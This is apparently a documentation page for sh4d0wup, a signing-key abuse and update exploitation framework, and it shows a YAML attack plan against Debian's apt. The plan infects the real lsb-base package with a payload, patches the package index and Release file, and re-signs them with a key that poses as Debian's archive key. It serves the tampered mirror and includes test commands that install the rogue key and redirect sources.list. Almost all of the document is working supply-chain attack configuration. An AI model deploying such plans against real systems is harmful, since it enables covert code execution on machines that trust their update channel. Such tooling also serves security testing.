sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111

---

upstreams:
  debian:
    url: https://deb.debian.org/

signing_keys:
  apt:
    type: pgp
    uids: ["Debian Archive Automatic Signing Key (11/bullseye) <ftpmaster@debian.org>"]

artifacts:
  release_upstream:
    type: url
    url: https://deb.debian.org/debian/dists/stable/InRelease
  index_upstream:
    type: url
    url: https://deb.debian.org/debian/dists/stable/main/binary-amd64/Packages.xz
  pkg_upstream:
    type: url
    url: https://deb.debian.org/debian/pool/main/l/lsb/lsb-base_11.1.0_all.deb
    sha256: 89ed6332074d827a65305f9a51e591dff20641d61ff5e11f4e1822a9987e96fe

  pkg_infected:
    type: infect
    infect: deb
    artifact: pkg_upstream
    payload: id
  index_patched:
    type: tamper
    tamper: patch-apt-package-list
    artifact: index_upstream
    compression: none
    patch:
      - name: lsb-base
        artifact: pkg_infected
        set:
          Version:
            - 11.1337.0
          Filename:
            - pool/main/l/lsb/lsb-base_11.1337.0_all.deb
  index_patched_gz:
    type: compress
    compression: gzip
    artifact: index_patched
  index_patched_xz:
    type: compress
    compression: xz
    artifact: index_patched
  release_patched:
    type: tamper
    tamper: patch-apt-release
    artifact: release_upstream
    signing_key: apt
    patch:
      - name: main/binary-amd64/Packages
        artifact: index_patched
      - name: main/binary-amd64/Packages.gz
        artifact: index_patched_gz
      - name: main/binary-amd64/Packages.xz
        artifact: index_patched_xz

check:
  image: debian:stable
  install_keys:
    - key: apt
      binary: true
      cmd: 'tee /etc/apt/trusted.gpg.d/pwn.gpg > /dev/null'
  cmds:
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable main" | tee /etc/apt/sources.list'
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian-security stable-security main" | tee -a /etc/apt/sources.list'
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable-updates main" | tee -a /etc/apt/sources.list'
    - ["apt-get", "update"]
    - ["env", "DEBIAN_FRONTEND=noninteractive", "apt-get", "upgrade", "-y"]

routes:
  - path: /debian/dists/stable/InRelease
    type: static
    args:
      artifact: release_patched

  - type: static
    args:
      path_template: "/debian/dists/stable/main/binary-amd64/by-hash/SHA256/{{sha256}}"
      artifacts:
        - index_patched
        - index_patched_gz
        - index_patched_xz
        - pkg_infected

  - path: /debian/dists/stable/main/binary-amd64/Packages
    type: static
    args:
      artifact: index_patched
  - path: /debian/dists/stable/main/binary-amd64/Packages.gz
    type: static
    args:
      artifact: index_patched_gz
  - path: /debian/dists/stable/main/binary-amd64/Packages.xz
    type: static
    args:
      artifact: index_patched_xz

  - path: /debian/pool/main/l/lsb/lsb-base_11.1337.0_all.deb
    type: static
    args:
      artifact: pkg_infected

  - type: proxy
    args:
      upstream: debian